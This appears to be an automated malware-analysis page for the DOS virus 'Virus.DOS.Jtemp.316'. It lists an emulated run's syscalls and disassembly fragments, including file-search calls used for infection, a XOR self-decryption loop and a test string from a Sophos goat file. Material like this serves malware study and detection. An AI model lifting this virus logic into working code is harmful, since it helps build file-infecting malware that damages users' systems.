Sample viewer

vx.netlux.org/Virus.DOS.Jtemp.316

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:35.998140257Z 26 PC: 13e58 | Set disk transfer address
2018-12-17T22:34:35.999976618Z 44 PC: 13e5c | Get time 0x13e5c: and dh, 0x1f
0x13e5f: test dh, 7
0x13e62: jne 0x13e89
0x13e64: mov bl, dh
0x13e66: inc bl
0x13e68: mov cx, 0x27
0x13e6b: lea dx, word ptr [bp + 0x3e]
0x13e6e: mov ah, 0x4e
0x13e70: int 0x21
0x13e72: jb 0x13e89
0x13e74: dec bl
0x13e76: je 0x13e7e
0x13e78: mov ah, 0x4f
0x13e7a: int 0x21
0x13e7c: jae 0x13e74
0x13e7e: mov ax, word ptr [bp + 0x67]
0x13e81: sub ax, 4
0x13e84: mov word ptr [bp + 0x4b], ax
0x13e87: jae 0x13ec6
0x13e89: mov ah, 0x2c
2018-12-17T22:34:36.002407267Z 44 PC: 13e8d | Get time 0x13e8d: test dh, 2
0x13e90: jne 0x13ec5
0x13e92: lea si, word ptr [bp]
0x13e95: mov di, si
0x13e97: mov cx, 0x3e
0x13e9a: lodsb al, byte ptr [si]
0x13e9b: xor al, cl
0x13e9d: stosb byte ptr es:[di], al
0x13e9e: loop 0x13e9a
0x13ea0: lea dx, word ptr [bp + 0x1b]
0x13ea3: mov ah, 9
0x13ea5: int 0x21
0x13ea7: mov ah, 0x2a
0x13ea9: int 0x21
0x13eab: xor ah, ah
0x13ead: shl al, 1
0x13eaf: shl al, 1
0x13eb1: lea dx, word ptr [bp]
0x13eb4: add dx, ax
0x13eb6: mov ah, 9
2018-12-17T22:34:36.004883163Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:34:36.011260677Z 0 PC: 12a89 | Program terminate